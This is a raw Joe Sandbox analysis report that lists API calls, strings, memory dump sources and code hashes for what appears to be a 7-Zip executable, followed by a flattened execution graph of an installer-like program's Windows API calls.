                                • Part of subcall function 00F98E64: free.MSVCRT ref: 00F98EB0
                                • Part of subcall function 00F99930: free.MSVCRT ref: 00F99962
                                • Part of subcall function 00F99930: free.MSVCRT ref: 00F9996B
                                • Part of subcall function 00F99930: free.MSVCRT ref: 00F99974
                                • Part of subcall function 00F99930: free.MSVCRT ref: 00F9997C
                              • free.MSVCRT ref: 00F9C072
                              • free.MSVCRT ref: 00F9C07B
                              • free.MSVCRT ref: 00F9C0A6
                              • free.MSVCRT ref: 00F9C0AE
                               Similarity
                               • API ID: free
                               Similarity
                               • API ID: free
                               Similarity
                               • API ID: free
                               Similarity
                               • API ID: free
                               Similarity
                               • API ID: free
                               Similarity
                               • API ID: free
                              APIs
                              • free.MSVCRT ref: 00FC6B57
                              • free.MSVCRT ref: 00FC6B63
                              • free.MSVCRT ref: 00FC6B6F
                              • free.MSVCRT ref: 00FC6B86
                                • Part of subcall function 00FCB604: free.MSVCRT ref: 00FCB629
                                • Part of subcall function 00FCB604: free.MSVCRT ref: 00FCB636
                                • Part of subcall function 00FCB604: free.MSVCRT ref: 00FCB642
                                • Part of subcall function 00FCB604: free.MSVCRT ref: 00FCB64C
                                • Part of subcall function 00FCB604: free.MSVCRT ref: 00FCB656
                                • Part of subcall function 00FCB604: free.MSVCRT ref: 00FCB660
                                • Part of subcall function 00FCB604: free.MSVCRT ref: 00FCB66A
                                • Part of subcall function 00FCB604: free.MSVCRT ref: 00FCB674
                              • free.MSVCRT ref: 00FC6B9C
                               Similarity
                               • API ID: free
                               Similarity
                               • API ID: free
                              APIs
                              • free.MSVCRT ref: 00FC43BD
                                • Part of subcall function 00F72CF8: _CxxThrowException.MSVCRT ref: 00F72D3A
                              • free.MSVCRT ref: 00FC43DD
                              • free.MSVCRT ref: 00FC43E7
                                • Part of subcall function 00F72E68: free.MSVCRT ref: 00F72EA0
                               Similarity
                               • API ID: free$ExceptionThrow
                               • String ID: =
                              APIs
                              • free.MSVCRT ref: 00FB5EA0
                                • Part of subcall function 00F738A8: free.MSVCRT ref: 00F738E0
                                • Part of subcall function 00F736A8: memmove.MSVCRT ref: 00F736CD
                              • free.MSVCRT ref: 00FB5E92
                               Similarity
                               • API ID: free$memmove
                               • String ID: exe
                               Similarity
                               • API ID: free
                               • String ID: Cannot open input file
                               Similarity
                               • API ID: free$ByteStringmemmove
                              Similarity
                              • API ID: free$wcscmp
                              • String ID:
                              • API String ID: 4021281200-0
                              Similarity
                              • API ID: free
                              • String ID: Unsupported charset:
                              • API String ID: 1294909896-616772432
                              APIs
                                • Part of subcall function 00F786C8: GetFileAttributesW.KERNELBASE ref: 00F786EA
                                • Part of subcall function 00F786C8: GetFileAttributesW.KERNEL32 ref: 00F78721
                                • Part of subcall function 00F786C8: free.MSVCRT ref: 00F7872E
                              • DeleteFileW.KERNEL32 ref: 00F774BC
                              • DeleteFileW.KERNEL32 ref: 00F774F6
                              • free.MSVCRT ref: 00F77506
                              • free.MSVCRT ref: 00F77514
                                • Part of subcall function 00F76FCC: SetFileAttributesW.KERNELBASE ref: 00F76FF3
                              Similarity
                              • API ID: File$Attributesfree$Delete
                              • String ID:
                              • API String ID: 324319583-0
                              Similarity
                              • API ID: free$ErrorLastmemmove
                              • String ID: :
                              • API String ID: 3561842085-3653984579
                              Similarity
                              • API ID: ErrorLast$FileHandleRead
                              • String ID:
                              • API String ID: 2244327787-0
                              Similarity
                              • API ID: fputs
                              • String ID: Break signaled$ERROR: Can't allocate required memory!$System ERROR:
                              • API String ID: 1795875747-932691680
                              Similarity
                              • API ID: DirectoryRemovefree
                              • String ID:
                              • API String ID: 736856642-0
                              APIs
                              • _beginthreadex.MSVCRT ref: 00FCDC05
                              • SetThreadAffinityMask.KERNEL32 ref: 00FCDC21
                              • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00F90036), ref: 00FCDC2A
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00F90036), ref: 00FCDC35
                              Similarity
                              • API ID: Thread$AffinityErrorLastMaskResume_beginthreadex
                              • String ID:
                              • API String ID: 3268521904-0
                              APIs
                              • WaitForSingleObject.KERNEL32(?,?,?,?,00F8DC82), ref: 00FCDB0B
                              • GetLastError.KERNEL32(?,?,?,?,00F8DC82), ref: 00FCDB15
                              • CloseHandle.KERNEL32(?,?,?,?,00F8DC82), ref: 00FCDB30
                              • GetLastError.KERNEL32(?,?,?,?,00F8DC82), ref: 00FCDB3A
                              Similarity
                              • API ID: ErrorLast$CloseHandleObjectSingleWait
                              • String ID:
                              • API String ID: 1796208289-0
                              Similarity
                              • API ID: fputs$fputcfree
                              • String ID:
                              • API String ID: 3819637083-0
                              APIs
                              • memmove.MSVCRT ref: 00FC3C15
                                • Part of subcall function 00FC266C: CompareFileTime.KERNEL32(?,?,?,00000000,00FC3C28), ref: 00FC26B1
                              Similarity
                              • API ID: CompareFileTimememmove
                              • String ID: alternate streams$files$streams
                              • API String ID: 1303509325-806849385
                              Similarity
                              • API ID:
                              • String ID: UNC
                              • API String ID: 0-337201128
                              APIs
                              • fputs.MSVCRT ref: 00FBFEC9
                              • free.MSVCRT ref: 00FBFEE8
                                • Part of subcall function 00FCB4D0: memset.MSVCRT ref: 00FCB515
                                • Part of subcall function 00FCB4D0: fputs.MSVCRT ref: 00FCB53A
                              Similarity
                              • API ID: fputs$freememset
                              • String ID: ERROR:
                              • API String ID: 2276422817-977468659
                              APIs
                              • RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 00F7C5EA
                              • RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 00F7C638
                              Similarity
                              • API ID: QueryValue
                              • String ID: Path64
                              • API String ID: 3660427363-321863482
                              Strings
                              • Cannot open encrypted archive. Wrong password?, xrefs: 00FC404B
                              • Cannot open the file as archive, xrefs: 00FC408C
                              Similarity
                              • API ID: fputs
                              • String ID: Cannot open encrypted archive. Wrong password?$Cannot open the file as archive
                              • API String ID: 1795875747-1623556331
                              Similarity
                              • API ID: wcscmp
                              • String ID: \??\
                              • API String ID: 3392835482-3047946824
                              APIs
                              • fputs.MSVCRT ref: 00FC17C9
                                • Part of subcall function 00F724C4: fputc.MSVCRT ref: 00F724D5
                              Similarity
                              • API ID: fputcfputs
                              • String ID: Scan$Scanning
                              • API String ID: 269475090-1436252306
                              Similarity
                              • API ID: AllocExceptionStringThrow
                              • String ID: out of memory
                              • API String ID: 3773818493-2599737071
                              APIs
                              • fputs.MSVCRT ref: 00FCBAB0
                                • Part of subcall function 00F724C4: fputc.MSVCRT ref: 00F724D5
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputcfputs
                              • String ID: Scan $Scanning the drive:
                              • API String ID: 269475090-1085461122
                              • Opcode ID: 73586940df00f4b6d69776cd6b74b715b6af59ddf40c0bb38739c2a336eb302c
                              • Instruction ID: 6916e476b17ea18ab5a2ac9fea233e1d4e9a5416372b7f98599a8da029580d8b
                              • Opcode Fuzzy Hash: 73586940df00f4b6d69776cd6b74b715b6af59ddf40c0bb38739c2a336eb302c
                              • Instruction Fuzzy Hash: CAE04F6530194281DB55DB25DE4236C23229B44BE4F9494338E1D06625EF28C5DAD310
                              APIs
                              • free.MSVCRT ref: 00FAD4F6
                              • free.MSVCRT ref: 00FAD4FE
                              • free.MSVCRT ref: 00FAD7E8
                              • free.MSVCRT ref: 00FAD7F0
                                • Part of subcall function 00F75A4C: free.MSVCRT ref: 00F75A90
                                • Part of subcall function 00F75A4C: free.MSVCRT ref: 00F75A98
                                • Part of subcall function 00F75A4C: free.MSVCRT ref: 00F75B9C
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 1cf6d272e49ba4ce669bb840d82070fe307918df0bc4e7053bc0e4e4911742c5
                              • Instruction ID: 71ca2f9f023a646096beece41e4699ff62517283969f5452557913447363661e
                              • Opcode Fuzzy Hash: 1cf6d272e49ba4ce669bb840d82070fe307918df0bc4e7053bc0e4e4911742c5
                              • Instruction Fuzzy Hash: 62A1DFB2704B8196CB24DF26D5843AE7760F786BA4F148126DF8F47BA0EB39C854D701
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$memmove
                              • String ID:
                              • API String ID: 1534225298-0
                              • Opcode ID: ffb0adaf41483c79c17ca139e504a8e53c9321f0d0374eb2d4ffe7ddeb855848
                              • Instruction ID: 8a8c6f8d538bd0dbdbd0c22fcbef3ecc254daba6314c2f837b3c668f0c5695c6
                              • Opcode Fuzzy Hash: ffb0adaf41483c79c17ca139e504a8e53c9321f0d0374eb2d4ffe7ddeb855848
                              • Instruction Fuzzy Hash: 5741D763A0828296D730EB19D95026D6761F3987E4F44C133EB9D4B658EB3CC99AE703
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$memmove
                              • String ID:
                              • API String ID: 1534225298-0
                              • Opcode ID: 94b2e959682d2308284c979b5997617d8cbc15843639581ed360518275078fb1
                              • Instruction ID: 54533536317c783adfd8d4c1030d8d94f4d1f631185cd95e872408998dc5434f
                              • Opcode Fuzzy Hash: 94b2e959682d2308284c979b5997617d8cbc15843639581ed360518275078fb1
                              • Instruction Fuzzy Hash: 972105B7A01B8485DB55AF26D8547297758FB86BE4F6C81259F5D0B340EFBCC842E310
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$memmove
                              • String ID:
                              • API String ID: 1534225298-0
                              • Opcode ID: 4916301fc4195bf7257e6660e747c78dc3022c4a2dcb8868d81adcbcc436c9fe
                              • Instruction ID: 6ad55d36adfd64ebc29205faa83aabf9da2966edd903ca46882a7d57ae47373d
                              • Opcode Fuzzy Hash: 4916301fc4195bf7257e6660e747c78dc3022c4a2dcb8868d81adcbcc436c9fe
                              • Instruction Fuzzy Hash: E531A833204A41D1CB60EF25D85139D7770F7C57A4F889222EA9E476A9EF3CC549EB11
                              APIs
                              • EnterCriticalSection.KERNEL32 ref: 00F8EBA3
                              • LeaveCriticalSection.KERNEL32 ref: 00F8EBAF
                              • EnterCriticalSection.KERNEL32 ref: 00F8EC43
                              • LeaveCriticalSection.KERNEL32 ref: 00F8EC4F
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: CriticalSection$EnterLeave
                              • String ID:
                              • API String ID: 3168844106-0
                              • Opcode ID: e3da21429a98c917f99eba1a7ae18c4b33130e4024c0b284e560039400f1db44
                              • Instruction ID: 43144e0a20930b4df0885b29608587c0491ec0e68126df972e33411b6066aa2f
                              • Opcode Fuzzy Hash: e3da21429a98c917f99eba1a7ae18c4b33130e4024c0b284e560039400f1db44
                              • Instruction Fuzzy Hash: B2210076700B45A7CB20AF2AE9843AD3360F74AB98F585122DF4E47B10DF38D8A5D700
                              APIs
                                • Part of subcall function 00FB5A44: _CxxThrowException.MSVCRT ref: 00FB5A74
                                • Part of subcall function 00FB5A44: memmove.MSVCRT ref: 00FB5AAD
                                • Part of subcall function 00FB5A44: free.MSVCRT ref: 00FB5AB5
                                • Part of subcall function 00F72350: malloc.MSVCRT ref: 00F72360
                                • Part of subcall function 00F72350: _CxxThrowException.MSVCRT ref: 00F7237B
                              • free.MSVCRT ref: 00FAD0B2
                              • free.MSVCRT ref: 00FAD0BC
                              • free.MSVCRT ref: 00FAD0C6
                              • free.MSVCRT ref: 00FAD0D0
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$ExceptionThrow$mallocmemmove
                              • String ID:
                              • API String ID: 1702027931-0
                              • Opcode ID: 9fcd43eefa73e394517c0ee8c9fd584c3da427bfd578f162cd9c0542c0702979
                              • Instruction ID: 62658090861b9350bc00ffd2555d969c57246cc144eeea6c59d3e2dee3cff3e4
                              • Opcode Fuzzy Hash: 9fcd43eefa73e394517c0ee8c9fd584c3da427bfd578f162cd9c0542c0702979
                              • Instruction Fuzzy Hash: 1F2183B2615B8482CBA0EF25E88021D33B5F7C9BA4F2082269B9E47768DF3DC855D741
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 0ada6d7585ae9709d98b08fbd08e01cd3c63d5cd0dc02f0aeaf66522c8f6043c
                              • Instruction ID: dba9618e96cfc7eb210d45813e10725dbfa55c3724a841203e13622c8be3816f
                              • Opcode Fuzzy Hash: 0ada6d7585ae9709d98b08fbd08e01cd3c63d5cd0dc02f0aeaf66522c8f6043c
                              • Instruction Fuzzy Hash: 6911936371464486EF609A26D84036D7760A78ABF4F0443219B9E4BA95DF2DCD47E302
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: memcmp
                              • String ID:
                              • API String ID: 1475443563-0
                              • Opcode ID: f196707fa33a710a6e46a40aea969b5deca21029894ce235fc118b4c4d1c3aaf
                              • Instruction ID: 4fe6e4eac27e0ecf1214d55bb090f474acca50ce9856ac295878690ff1720924
                              • Opcode Fuzzy Hash: f196707fa33a710a6e46a40aea969b5deca21029894ce235fc118b4c4d1c3aaf
                              • Instruction Fuzzy Hash: D001DEF230574641EB149F229E517B833269B5AFD4F884036CE098B706FFB8C951E304
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: memcmp
                              • String ID:
                              • API String ID: 1475443563-0
                              • Opcode ID: d06369ecdc28b0a705b8f5a78abc2d88ad771fd5d20fed5fb0d2dce4f68be1b8
                              • Instruction ID: 9d032d349334fcfa54b51f8355a8ed6a76571faad498a97aaaf9e76c25068e04
                              • Opcode Fuzzy Hash: d06369ecdc28b0a705b8f5a78abc2d88ad771fd5d20fed5fb0d2dce4f68be1b8
                              • Instruction Fuzzy Hash: 0E0192B234974351EB149F269E42BB433669B19FD4F88903A8E059B305EF7CC956E304
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 813d90adbe70e94906d70a422908a3570b15f95030edf62c32f227ae548bc4b6
                              • Instruction ID: a12ea0fa6fd6a56ca64368ca21d4924aee39e492fe753c1d10dcb2c40de639bb
                              • Opcode Fuzzy Hash: 813d90adbe70e94906d70a422908a3570b15f95030edf62c32f227ae548bc4b6
                              • Instruction Fuzzy Hash: 1001B563710E89859661BD57AC9052A6614AB05FF9B1D8117EE2C4B340DF7AC8529311
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 7b4fba1c380075a19085162e6bd658fea28b4ac5520fde6bbe94776417234c12
                              • Instruction ID: cd9c6194a9127603abc2395bd0dd504fc69e4f7ef4ee058ecad08a794eb3be24
                              • Opcode Fuzzy Hash: 7b4fba1c380075a19085162e6bd658fea28b4ac5520fde6bbe94776417234c12
                              • Instruction Fuzzy Hash: 22F0BB53B01648489B90AE2BDC9016C63109F95BF8B5D413AEF0D0B344DE55CC929350
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 8d8b0820cca602ebf3b2a962fd6fd47eb7f6280dff4f65e24150de5827f7fc7a
                              • Instruction ID: 3edc1678bbdcea0492af2027cd4565182ed5aba44f0bd2ae8903a918ae40678f
                              • Opcode Fuzzy Hash: 8d8b0820cca602ebf3b2a962fd6fd47eb7f6280dff4f65e24150de5827f7fc7a
                              • Instruction Fuzzy Hash: B0F08913B0198485DB91BE27DC5116C63209B95FE5B5D85229F1D1F354DE3DCC52A311
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 11eeaecf133e82959a5403608a25ee7e2b55dc720599b072d793fea8b22b22c9
                              • Instruction ID: 945672704b5b2cc222f26cace28750e6829a66c973af69a8cf2299276651edb1
                              • Opcode Fuzzy Hash: 11eeaecf133e82959a5403608a25ee7e2b55dc720599b072d793fea8b22b22c9
                              • Instruction Fuzzy Hash: 5AD0671260050A80CBD4EB76DCA202C2320DBD9F88B549013AA0E9F215CD1ECCA3E3A2

                              Execution Graph

                              Execution Coverage:34.9%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:10%
                              Total number of Nodes:1344
                              Total number of Limit Nodes:42
3904->3905 3906 40176a 3905->3906 3907 40605c 2 API calls 3906->3907 3907->3906 4073 401d5d 4074 402d84 17 API calls 4073->4074 4075 401d6e SetWindowLongW 4074->4075 4076 402c2a 4075->4076 3908 4028de 3909 4028e6 3908->3909 3910 4028ea FindNextFileW 3909->3910 3913 4028fc 3909->3913 3911 402943 3910->3911 3910->3913 3914 40653d lstrcpynW 3911->3914 3914->3913 3915 4056de 3916 405888 3915->3916 3917 4056ff GetDlgItem GetDlgItem GetDlgItem 3915->3917 3919 405891 GetDlgItem CreateThread CloseHandle 3916->3919 3920 4058b9 3916->3920 3960 4044ce SendMessageW 3917->3960 3919->3920 3963 405672 5 API calls 3919->3963 3922 4058e4 3920->3922 3923 4058d0 ShowWindow ShowWindow 3920->3923 3924 405909 3920->3924 3921 40576f 3929 405776 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3921->3929 3925 405944 3922->3925 3926 4058f8 3922->3926 3927 40591e ShowWindow 3922->3927 3962 4044ce SendMessageW 3923->3962 3928 404500 8 API calls 3924->3928 3925->3924 3937 405952 SendMessageW 3925->3937 3931 404472 SendMessageW 3926->3931 3933 405930 3927->3933 3934 40593e 3927->3934 3932 405917 3928->3932 3935 4057e4 3929->3935 3936 4057c8 SendMessageW SendMessageW 3929->3936 3931->3924 3938 40559f 24 API calls 3933->3938 3939 404472 SendMessageW 3934->3939 3940 4057f7 3935->3940 3941 4057e9 SendMessageW 3935->3941 3936->3935 3937->3932 3942 40596b CreatePopupMenu 3937->3942 3938->3934 3939->3925 3944 404499 18 API calls 3940->3944 3941->3940 3943 40657a 17 API calls 3942->3943 3946 40597b AppendMenuW 3943->3946 3945 405807 3944->3945 3949 405810 ShowWindow 3945->3949 3950 405844 GetDlgItem SendMessageW 3945->3950 3947 405998 GetWindowRect 3946->3947 3948 4059ab TrackPopupMenu 3946->3948 3947->3948 3948->3932 3951 4059c6 3948->3951 3952 405833 3949->3952 3953 405826 ShowWindow 3949->3953 3950->3932 3954 40586b SendMessageW SendMessageW 3950->3954 3955 4059e2 SendMessageW 3951->3955 3961 4044ce SendMessageW 3952->3961 3953->3952 3954->3932 3955->3955 3956 4059ff OpenClipboard 
EmptyClipboard GlobalAlloc GlobalLock 3955->3956 3958 405a24 SendMessageW 3956->3958 3958->3958 3959 405a4d GlobalUnlock SetClipboardData CloseClipboard 3958->3959 3959->3932 3960->3921 3961->3950 3962->3922 4077 404ce0 4078 404cf0 4077->4078 4079 404d0c 4077->4079 4088 405b81 GetDlgItemTextW 4078->4088 4081 404d12 SHGetPathFromIDListW 4079->4081 4082 404d3f 4079->4082 4084 404d22 4081->4084 4087 404d29 SendMessageW 4081->4087 4083 404cfd SendMessageW 4083->4079 4085 40140b 2 API calls 4084->4085 4085->4087 4087->4082 4088->4083 4089 401563 4090 402ba4 4089->4090 4093 406484 wsprintfW 4090->4093 4092 402ba9 4093->4092 4094 401968 4095 402d84 17 API calls 4094->4095 4096 40196f 4095->4096 4097 402d84 17 API calls 4096->4097 4098 40197c 4097->4098 4099 402da6 17 API calls 4098->4099 4100 401993 lstrlenW 4099->4100 4101 4019a4 4100->4101 4105 4019e5 4101->4105 4106 40653d lstrcpynW 4101->4106 4103 4019d5 4104 4019da lstrlenW 4103->4104 4103->4105 4104->4105 4106->4103 4107 40166a 4108 402da6 17 API calls 4107->4108 4109 401670 4108->4109 4110 406873 2 API calls 4109->4110 4111 401676 4110->4111 4112 402aeb 4113 402d84 17 API calls 4112->4113 4114 402af1 4113->4114 4115 40657a 17 API calls 4114->4115 4116 40292e 4114->4116 4115->4116 4117 4026ec 4118 402d84 17 API calls 4117->4118 4125 4026fb 4118->4125 4119 402838 4120 402745 ReadFile 4120->4119 4120->4125 4121 4060b0 ReadFile 4121->4125 4123 402785 MultiByteToWideChar 4123->4125 4124 40283a 4139 406484 wsprintfW 4124->4139 4125->4119 4125->4120 4125->4121 4125->4123 4125->4124 4127 4027ab SetFilePointer MultiByteToWideChar 4125->4127 4128 40284b 4125->4128 4130 40610e SetFilePointer 4125->4130 4127->4125 4128->4119 4129 40286c SetFilePointer 4128->4129 4129->4119 4131 40612a 4130->4131 4134 406142 4130->4134 4132 4060b0 ReadFile 4131->4132 4133 406136 4132->4133 4133->4134 4135 406173 SetFilePointer 4133->4135 4136 40614b SetFilePointer 4133->4136 4134->4125 4135->4134 4136->4135 4137 406156 4136->4137 4138 4060df 
